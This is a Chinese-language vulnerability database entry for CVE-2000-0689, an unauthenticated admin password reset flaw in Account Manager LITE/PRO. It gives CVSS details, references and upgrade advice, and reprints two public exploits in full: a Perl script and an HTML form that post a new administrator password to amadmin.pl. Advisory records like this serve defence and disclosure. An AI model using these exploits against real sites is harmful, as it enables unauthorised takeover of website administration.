CVE-2000-0689
CVSS7.5
发布时间 :2000-10-20 00:00:00
修订时间 :2008-09-05 16:21:38
NMCOES    

[原文]Account Manager LITE does not properly authenticate attempts to change the administrator password, which allows remote attackers to gain privileges for the Account Manager by directly calling the amadmin.pl script with the setpasswd parameter.


[CNNVD]CGI Script Center Account Manager LITE / PRO管理员密码变更漏洞(CNNVD-200010-026)

        Account Manager LITE不正确认证修改管理员密码的尝试,远程攻击者可以通过直接调用setpasswd参数的amadmin.pl脚本获取Account Manager的权限。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:cgi_script_center:account_manager:pro_1.0
cpe:/a:cgi_script_center:account_manager:lite_1.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0689
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0689
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200010-026
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1604
(VENDOR_ADVISORY)  BID  1604
http://www.cgiscriptcenter.com/acctlite/
(UNKNOWN)  CONFIRM  http://www.cgiscriptcenter.com/acctlite/
http://archives.neohapsis.com/archives/bugtraq/2000-08/0291.html
(VENDOR_ADVISORY)  BUGTRAQ  20000823 Account Manager CGI Vulnerability
http://xforce.iss.net/xforce/xfdb/5125
(UNKNOWN)  XF  account-manager-overwrite-password(5125)
http://www.osvdb.org/13341
(UNKNOWN)  OSVDB  13341

- 漏洞信息

CGI Script Center Account Manager LITE / PRO管理员密码变更漏洞
高危 访问验证错误
2000-10-20 00:00:00 2005-10-20 00:00:00
远程※本地  
        Account Manager LITE不正确认证修改管理员密码的尝试,远程攻击者可以通过直接调用setpasswd参数的amadmin.pl脚本获取Account Manager的权限。

- 公告与补丁

        CGI Script Center has eliminated this vulnerability with the latest releases of Account Manager LITE and PRO. They are available for download at the following URL:
        Account Manager LITE
        http://www.cgiscriptcenter.com/acctlite/
        Account Manager PRO
        http://www.cgiscriptcenter.com/acctman/

- 漏洞信息 (20164)

CGI Script Center Account Manager 1.0 LITE / PRO Administrative Password Alteration (1) (EDBID:20164)
cgi remote
2000-08-23 Verified
0 teleh0r
N/A [点击下载]
source: http://www.securityfocus.com/bid/1604/info

Regardless of privilege level, any remote user can modify the administrative password for CGI Script Centers' Account Manager. In order to accomplish this, a user would access the following URL with a POST command:

http://target/cgibin/amadmin.pl?setpasswd

This would grant the user full administrative privileges which includes the capability of granting and revoking user access to secured areas of the target website.

#!/usr/bin/perl -w

## Account Manager LITE 1.0x / cgi.elitehost.com
## This exploit let's you change the administrator
## password, and completely take controll.
##
## teleh0r@doglover.com / anno 2000
## httpd://teleh0r.cjb.net

use strict;
use Socket;

if (@ARGV < 2) {
    print("Usage: $0 <target> <newpass>\n");
    exit(1);
}

my($target,$newpass,$crypt,$length,$command,
   $agent,$sploit,$iaddr,$paddr,$proto);

($target,$newpass) = @ARGV;

$crypt = crypt($newpass, 'aa');
$length = 34 + length($newpass);

print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/subscribe.pl\n");
print("New password: $newpass / $crypt\n\n");

$command = "pwd=$newpass&pwd2=$newpass&setpwd=++Set+Password++";
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

# Note that POST /cgi-bin/amlite/amadmin.pl HTTP/1.0
# may have to be changed...

$sploit=
"POST /cgi-bin/amlite/amadmin.pl HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: $length

$command";

$iaddr = inet_aton($target)                     || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr)                || die("Error: $!\n");
$proto = getprotobyname('tcp')                  || die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto)    || die("Error: $!\n");
connect(SOCKET, $paddr)                         || die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0)               || die("Error: $!\n");
close(SOCKET);

sleep(2);
print("Surf to http://$target/cgi-bin/amlite/amadmin.pl\n");
exit(0);		

- 漏洞信息 (20165)

CGI Script Center Account Manager 1.0 LITE / PRO Administrative Password Alteration (2) (EDBID:20165)
cgi remote
2000-08-23 Verified
0 n30
N/A [点击下载]
source: http://www.securityfocus.com/bid/1604/info
 
Regardless of privilege level, any remote user can modify the administrative password for CGI Script Centers' Account Manager. In order to accomplish this, a user would access the following URL with a POST command:
 
http://target/cgibin/amadmin.pl?setpasswd
 
This would grant the user full administrative privileges which includes the capability of granting and revoking user access to secured areas of the target website.


<FORM ACTION="http://www.decodeco.com/cgi-bin/acctman/amadmin.pl" METHOD="POST"><CENTER><BR>
<TABLE BORDER="0" WIDTH="450"><TBODY><COLDEFS><COLDEF></COLDEFS><ROWS><TR><TD
COLSTART="1"><P><B><FONT FACE="verdana, arial, helvetica"><FONT
COLOR="#FF0000">Account Manager LITE/PRO</FONT>:  Password Exploit!</FONT></B></P>
<CENTER><FONT FACE="verdana, arial, helvetica"><FONTCOLOR="#FF0000">n30</FONT></B></P></CENTER>
<P><FONT SIZE="-1" FACE="verdana, arial, helvetica">Please enter your password twice.  Once to set it, and once to confirm it.</FONT></P>
<CENTER><TABLE BORDER="0"><TBODY><COLDEFS><COLDEF><COLDEF></COLDEFS><ROWS><TR
><TD ALIGN="RIGHT" COLSTART="1"><INPUT TYPE="PASSWORD" NAME="pwd"></TD><TD
COLSTART="2"><FONT SIZE="-2" FACE="verdana, arial, helvetica">password</FONT></TD></TR>
<TR><TD ALIGN="RIGHT" COLSTART="1"><INPUT TYPE="PASSWORD" NAME="pwd2"></TD><TD
COLSTART="2"><FONT SIZE="-2" FACE="verdana, arial, helvetica">confirmation</FONT></TD></TR>
<TR><TD ALIGN="CENTER" COLSTART="1"><BR><INPUT
TYPE="SUBMIT" NAME="setpwd" VALUE="  Set Password  "></TD><TD COLSTART="2"><BR></TD></TR></ROWS></TBODY></TABLE></CENTER><CENTER><TABLE
BORDER="0" WIDTH="400"><TBODY><COLDEFS><COLDEF></COLDEFS><ROWS><TR><TD
COLSTART="1"><HR SIZE="1"></TD></TR><TR><TD ALIGN="CENTER" COLSTART="1"><FONT
SIZE="-2" FACE="verdana, arial, helvetica"><B>Account Manager LITE/PRO Admin Passwerd Exploit
</B></A></FONT></TD></TR></ROWS></TBODY></TABLE></CENTER></TD></TR></ROWS></TBODY></TABLE></CENTER>
<CENTER><FONTSIZE="1" FACE="verdana, arial, helvetica"><B><BR> To Use Modify Source To Point to amadmin.pl on TARGET Server <BR><BR><a href="mailto:n30@alldas.de">mail-me</a></CENTER>
</FORM>

<!-- Shoutz to trib, axess and all who know me! -->


		

- 漏洞信息

13341
Account Manager LITE amadmin.pl Admin Password Modification
Remote / Network Access Authentication Management, Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

Account Manager Lite contains a flaw that may allow an attacker to carry out a privilege escalation attack. The issue is due to the amadmin.pl script not properly sanitizing user-supplied input. This may allow an attacker to grant or revoke privileges to users on secure portions of the target website.

- 时间线

2000-08-23 Unknow
2000-08-23 Unknow

- 解决方案

Upgrade to version 1.09 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

CGI Script Center Account Manager LITE / PRO Administrative Password Alteration Vulnerability
Access Validation Error 1604
Yes Yes
2000-08-23 12:00:00 2009-07-11 02:56:00
Posted to Bugtraq on August 23, 2000 by n30 <n30@alldas.de>.

- 受影响的程序版本

CGI Script Center Account Manager PRO 1.0
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- Sun Solaris 8_sparc
- Sun SunOS 4.1.4
CGI Script Center Account Manager LITE 1.0
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- Sun Solaris 8_sparc
- Sun SunOS 4.1.4

- 漏洞讨论

Regardless of privilege level, any remote user can modify the administrative password for CGI Script Centers' Account Manager. In order to accomplish this, a user would access the following URL with a POST command:

http://target/cgibin/amadmin.pl?setpasswd

This would grant the user full administrative privileges which includes the capability of granting and revoking user access to secured areas of the target website.

- 漏洞利用

n30 &lt;n30@alldas.de&gt; has released the exploit cgiamsploit.htm.

teleh0r &lt;teleh0r@doglover.com&gt; has released the exploit amlite-xploit.pl.

- 解决方案

CGI Script Center has eliminated this vulnerability with the latest releases of Account Manager LITE and PRO. They are available for download at the following URL:

Account Manager LITE
http://www.cgiscriptcenter.com/acctlite/

Account Manager PRO
http://www.cgiscriptcenter.com/acctman/

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站